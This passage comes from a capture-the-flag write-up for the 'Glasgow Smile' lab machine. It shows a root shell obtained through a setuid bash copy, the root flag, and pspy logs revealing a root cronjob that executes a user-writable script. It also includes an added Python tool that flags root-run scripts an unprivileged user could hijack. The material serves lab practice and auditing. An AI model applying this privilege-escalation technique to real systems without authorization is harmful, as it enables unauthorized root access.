- Obtain root shell w/ /tmp/rootbash -p (without -p, bash drops the setuid privilege when euid differs from uid)
- Root Flag
rootbash-5.0# cd /root
rootbash-5.0# ls
root.txt
whoami
rootbash-5.0# cat root.txt
(ASCII-art banner)
Congratulations! You've got the Glasgow Smile!
JKR{68028b11a1b7d56c521a90fc18252995}
Credits by mindsflee
- Snoop processes w/o root privileges
penguin@glasgowsmile:/tmp$ ./pspy64
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
2022/01/27 03:13:01 CMD: UID=0    PID=13411  | /usr/sbin/CRON -f
2022/01/27 03:13:01 CMD: UID=0    PID=13412  | /bin/sh -c /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old
2022/01/27 03:13:01 CMD: UID=0    PID=13413  | /bin/sh -c /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old
2022/01/27 03:13:01 CMD: UID=0    PID=13414  | /bin/bash /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old
2022/01/27 03:13:12 CMD: UID=0    PID=13415  |
2022/01/27 03:14:01 CMD: UID=0    PID=13416  | /usr/sbin/CRON -f
2022/01/27 03:14:02 CMD: UID=0    PID=13417  | /usr/sbin/CRON -f
2022/01/27 03:14:02 CMD: UID=0    PID=13418  | /bin/sh -c /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old
2022/01/27 03:14:02 CMD: UID=0    PID=13419  | /bin/bash /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old
2022/01/27 03:15:01 CMD: UID=0    PID=13420  | /usr/sbin/CRON -f
2022/01/27 03:15:01 CMD: UID=0    PID=13421  | /usr/sbin/CRON -f
2022/01/27 03:15:01 CMD: UID=0    PID=13422  | /bin/sh -c /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old
2022/01/27 03:15:01 CMD: UID=0    PID=13423  | /bin/bash /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old
- Confirms that a root cronjob (UID=0) executes .trash_old every minute, which is why overwriting it yielded a root shell
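A small triage script, added here and not part of the writeup or of pspy, that turns the observation above into a repeatable check: parse pspy's "CMD: UID=0 PID=n | command" lines, keep the script paths root executes (stripping the /bin/sh -c and interpreter prefixes), and flag those the current user can write to or replace through a writable parent directory. The sample log lines are constructed after the pspy output above; demo() substitutes a temporary directory for /home/penguin/SomeoneWhoHidesBehindAMask so it runs anywhere.

```python
"""Spot root-executed scripts that an unprivileged user can overwrite.

Added example (not from the writeup or from pspy).  Feed it pspy output on
stdin, or run it as-is against the constructed sample lines below.
"""
import os
import re
import stat
import sys
import tempfile

# Matches e.g. "2022/01/27 03:13:01 CMD: UID=0 PID=13414 | /bin/bash /path/.trash_old"
PSPY_RE = re.compile(r"CMD: UID=(?P<uid>\d+)\s+PID=\d+\s+\|\s*(?P<cmd>.*)$")
INTERPRETERS = {"/bin/sh", "/bin/bash", "/usr/bin/python", "/usr/bin/python3", "/usr/bin/perl"}


def root_run_paths(lines):
    """Absolute paths that root (UID=0) ran, minus cron itself and interpreters."""
    found = set()
    for line in lines:
        m = PSPY_RE.search(line)
        if not m or m.group("uid") != "0":
            continue
        argv = m.group("cmd").split()
        # "/bin/sh -c /x/y.sh" and "/bin/bash /x/y.sh" both point at /x/y.sh
        while argv and (argv[0] in INTERPRETERS or argv[0] == "-c"):
            argv = argv[1:]
        for tok in argv:
            if tok.startswith("/") and tok != "/usr/sbin/CRON":
                found.add(tok)
    return found


def hijackable(paths):
    """Paths the current user can write, or replace via a writable parent dir."""
    out = []
    for p in sorted(paths):
        if os.access(p, os.W_OK) or os.access(os.path.dirname(p), os.W_OK):
            out.append(p)
    return out


# Constructed after the pspy output in the writeup (one non-root line added).
SAMPLE_PSPY = [
    "2022/01/27 03:13:01 CMD: UID=0 PID=13411 | /usr/sbin/CRON -f",
    "2022/01/27 03:13:01 CMD: UID=0 PID=13412 | /bin/sh -c /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old",
    "2022/01/27 03:13:01 CMD: UID=0 PID=13414 | /bin/bash /home/penguin/SomeoneWhoHidesBehindAMask/.trash_old",
    "2022/01/27 03:13:05 CMD: UID=1001 PID=13415 | /bin/bash /home/penguin/.profile",
]


def demo():
    """Re-point the sample lines at a temp dir holding a writable script and
    return (root-run paths, hijackable paths)."""
    with tempfile.TemporaryDirectory() as d:
        script = os.path.join(d, ".trash_old")
        with open(script, "w") as f:
            f.write("#!/bin/bash\n")
        os.chmod(script, stat.S_IRWXU | stat.S_IRGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IXOTH)
        lines = [ln.replace("/home/penguin/SomeoneWhoHidesBehindAMask", d) for ln in SAMPLE_PSPY]
        paths = root_run_paths(lines)
        return paths, hijackable(paths)


if __name__ == "__main__":
    lines = sys.stdin.read().splitlines() if not sys.stdin.isatty() else SAMPLE_PSPY
    for p in hijackable(root_run_paths(lines)):
        print("run as root and writable by us:", p)
```

On the box itself this is `./pspy64 | python3 cronhijack.py` after a couple of minutes of capture; the same parser works on crontab lines if you feed it "CMD: UID=0 PID=0 | <command>" per entry.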